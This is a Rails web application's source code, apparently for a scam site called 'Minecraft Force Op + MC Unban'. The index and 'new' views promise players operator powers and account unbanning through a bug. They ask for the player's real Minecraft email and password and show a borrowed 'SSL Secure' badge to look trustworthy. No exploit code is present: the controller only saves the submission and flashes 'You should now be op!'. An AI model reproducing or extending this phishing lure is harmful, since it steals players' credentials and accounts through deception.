config/routes.rb
Mcforceop::Application.routes.draw do
  
  resources :logins
  root :to => "logins#index"
  
  get 'logins/updates' => 'logins#updates'

  

end

app/models/login.rb
class Login < ActiveRecord::Base
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  protect_from_forgery with: :exception
end

app/controllers/logins_controller.rb
class LoginsController < ApplicationController
  def index
    @logins = Login.all
  end
  
  def show
    @logins = Login.find(params[:id])
  end
  
  def new
    @login = Login.new
  end
  
  def create
    @login = Login.new
    
    if @login.save
      redirect_to logins_path, :notice => "You should now be op!"
    else
      render "new"
    end
  end
  
  def edit
    
  end
  
  def update
    
  end
  
  def destroy
    
  end
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/helpers/logins_helper.rb
module LoginsHelper
end

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
<head>
  <title>Mc Force Op BETA</title>
  <%= stylesheet_link_tag    "application", media: "all", "data-turbolinks-track" => true %>
  <%= javascript_include_tag "application", "data-turbolinks-track" => true %>
  <%= csrf_meta_tags %>
</head>
<body>

<%= yield %>

<% flash.each do |key, value| %>
	<p style="color: #18D40B;"><%= value %></p>
<% end %>

</body>
</html>

app/views/logins/index.html.erb
<html>
	<head>
	</head>
	<body>
		<header>
			<h1>Minecraft Force Op + MC Unban</h1>
		</header>
		<div class="content" id="content">
			<p>This is a web site containing a new web application that takes advantage of a bug, allowing player to potentially become op and have operator commands as well as be able to exploit a recent account rendering glitch allowing you to get unbanned. This web application is still in early beta however it works and we would love some beta testers, No Ads or Surveys!</p>
			<div class="launchContainer">				
				<%= link_to "Launch App", new_login_path, :class => 'launch' %>
			</div>
		</div>
	</body>
</html>

app/views/logins/new.html.erb
<html>
	<head>
	</head>
	<body>
		<header>
			<h1>Minecraft Force Op + MC Unban</h1>
		</header>
		<div class="content" id="content">
		<form>
		Server Address <br /><input type="text" name="server">
		</form>
			<%= form_for @login, :url => { :action => "create" } do |f| %>
			<p>Login with your Minecraft Account to verify username.</p>
			<p>
				MC <%= f.label :email %><br />
				<%= f.text_field :email %>
			</p>
				MC <%= f.label :password %><img 	src="http://www.copperriverbags.com/product_images/uploaded_images/secure.png"style="padding-left: 2px;" height="15px" width="17px" title="SSL 	Secure"><br />
				<%=	f.password_field :username %>
			</p>
			<p style="font-size: 12px;">Be sure to enter your <span style="font-weight: bold;">real</span> Minecraft password into the secure password field in order to allow the desired Minecraft server to properly render your username.<br /> <a href="https://minecraft.net/resetpassword">Forgot your minecraft password?</a></p>
			<p>
				<%= f.submit 'Begin Force Op' %>
			</p>
			<% end %>
			<form>
			<input type="checkbox" name="vehicle" value="Op" checked>Op Account<br>
			<input type="checkbox" name="vehicle" value="Stealth" checked> Stealth Mode<br>
			<input type="checkbox" name="vehicle" value="UnBan">Un-ban Account
			</form>
		</div>
	</body>
</html>

<!-- <div class="content" id="content">
	<p>This is a web site containing a new web application that takes advantage of a bug, allowing player to potentially become op and have operator commands as well as be able to exploit a recent account rendering glitch allowing you to get unbanned. This web application is still in early beta however it works and we would love some beta testers, No Ads or Surveys!</p>
	<div class="launchContainer">				
		<%= link_to "Launch App", new_login_path, :class => 'launch' %>
	</div>
</div> -->